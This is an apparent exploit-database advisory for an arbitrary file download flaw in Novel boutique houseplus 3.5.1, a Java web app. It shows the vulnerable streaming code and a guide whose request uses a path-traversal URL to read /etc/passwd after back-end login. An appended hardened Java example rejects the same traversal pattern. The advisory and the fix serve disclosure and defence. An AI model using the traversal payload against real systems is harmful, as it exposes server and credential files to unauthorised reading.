Exploit / Vulnerability Discovered: 2021-03-29
Type: webapps
Platform: java
This exploit / vulnerability, Novel boutique houseplus 3.5.1 arbitrary file download, is for educational purposes only; if you use it, you do so at your own risk!
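    // Stream the already opened file (in) back to the client in 1 KB chunks.
    // Nothing in this fragment checks that the requested path stays inside
    // the intended directory.
    OutputStream out = resp.getOutputStream();
    byte[] b = new byte[1024];
    int len = 0;
    while ((len = in.read(b)) != -1) {
        out.write(b, 0, len);
    }
    out.flush();
    out.close();
    in.close();
}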
Guide:
1. Log in to the back-end management console.
2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd
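A hardened form of the download logic, as an added example that is not code from the advisory or from the project: the client-supplied path is resolved against a fixed upload root and rejected if it leaves that root. The class name, method names and the upload-root parameter are assumptions for illustration, the sample file is constructed, and the code needs Java 11 or later.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeDownload {
    // Resolve a client-supplied relative path against the upload root and reject
    // anything that lands outside it (../ sequences, absolute paths, symlinks).
    static Path resolveUnderBase(Path baseDir, String filePath) throws IOException {
        Path base = baseDir.toRealPath();
        Path candidate = base.resolve(filePath).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes upload directory");
        }
        // toRealPath() follows symlinks and throws if the file does not exist.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new SecurityException("path escapes upload directory");
        }
        return real;
    }

    // Same copy loop as the fragment above, but try-with-resources closes the
    // input stream even when writing to the response fails.
    static void send(Path file, OutputStream out) throws IOException {
        try (InputStream in = Files.newInputStream(file)) {
            in.transferTo(out);
            out.flush();
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample data: a temporary upload root holding one file.
        Path root = Files.createTempDirectory("upload");
        Files.writeString(root.resolve("report.txt"), "ok\n");
        send(resolveUnderBase(root, "report.txt"), System.out); // allowed
        try {
            resolveUnderBase(root, "../../../../etc/passwd"); // pattern from the guide
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

In a servlet handler, `send` would receive `resp.getOutputStream()`, and a `SecurityException` from `resolveUnderBase` should map to an error status such as 400 or 404 rather than a file body.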